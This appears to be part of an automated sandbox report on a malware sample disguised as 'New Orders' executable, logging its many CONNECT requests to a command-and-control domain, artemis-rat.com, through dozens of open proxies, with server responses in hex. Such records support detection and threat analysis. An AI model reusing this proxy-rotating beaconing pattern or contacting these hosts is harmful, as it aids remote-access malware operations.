                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:54.664129019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        689192.168.2.9520153.10.93.5031287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.440928936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.735358000 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        690192.168.2.951653124.160.118.18380807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.503505945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.000987053 CET323INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.8.1
                                                                                        Date: Tue, 12 Mar 2024 03:37:49 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 172
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.8.1</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        691192.168.2.95198614.103.26.5380007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.504302979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        692192.168.2.951694117.160.250.13088997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.504499912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.079098940 CET303INHTTP/1.1 400 Bad Request
                                                                                        Server: openresty
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 154
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        693192.168.2.951776171.244.140.16051897672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.504635096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        694192.168.2.95198537.235.48.19807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.504801035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        695192.168.2.952159104.21.31.189807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.504832983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.659485102 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        696192.168.2.950989128.199.196.31210497672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.504949093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        697192.168.2.952187172.67.181.17807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.504983902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.659312963 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        698192.168.2.951898212.220.13.9841537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.504987955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        699192.168.2.94983792.204.135.37550197672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.505486012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        700192.168.2.952207104.20.198.49807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.505506039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.659559965 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        701192.168.2.952065107.180.95.177647317672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.505589962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.132582903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.824282885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.166384935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.945462942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.647048950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.292031050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.632739067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:09.166471004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        702192.168.2.952214104.25.58.39807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.505590916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.661041975 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        703192.168.2.95194138.156.74.5180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.505661011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.423806906 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        704192.168.2.952211132.148.154.97314067672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.505723953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.945122957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.439068079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.491902113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.539046049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.633116961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.647072077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.632953882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:02.580060959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        705192.168.2.949814149.202.91.219807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.506422043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.664000034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.664382935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.773621082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:06.773169041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:18.773117065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:30.773103952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:54.773123980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        706192.168.2.95192920.219.118.36807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.507291079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.897556067 CET805INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 613
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
